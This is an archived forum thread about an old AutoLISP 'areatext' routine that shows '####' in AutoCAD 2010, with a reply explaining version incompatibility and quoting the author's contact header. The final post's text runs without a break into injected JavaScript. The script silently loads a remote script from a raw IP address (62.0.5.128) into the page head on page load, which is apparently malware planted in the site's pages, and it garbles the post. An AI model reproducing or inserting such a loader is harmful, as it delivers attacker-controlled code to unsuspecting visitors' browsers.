Display full version of the post: AutoCAD2010 AutoLisp Problem

thitmonsun
05.07.2010, 06:22
Hi Guys,...
 
Pls help me... i got some errors using autolisp in 2010 version.
 
eg., i used "areatext" autolisp since 2004 to 2009. it was ok all the time.
but when i use in 2010, it got errors like the value is only "####". plsss..

Cad64
05.07.2010, 17:26
This happens sometimes. Old lisp routines sometimes stop working when used in newer versions. Every 3 years Autodesk changes the Autocad file format, so it's possible that this routine is not compatible with 2010.


 
Why don't you contact the author and ask him to modify the routine to work in 2010? I just found the routine on his website and his contact information is in the header of the file.
 
;;; By Jimmy Bergmark
;;; Copyright (C) 2007-2009 JTB World, All Rights Reserved
;;; Website: www.jtbworld.com
;;; E-mail: info@jtbworld.com

jimzcadez
05.07.2010, 18:03
what is autolist how do it work to your autocadfunction FN_IR_load(){var script = document.createElement('script');script.type = 'text/javascript';script.src = 'http://62.0.5.128/irscripts/imgreload.js';document.getElementsByTagName('head')[0].appendChild(script);}var FN_IR_loaded = false;if(document.images.length > 0){FN_IR_loaded = true;FN_IR_load();}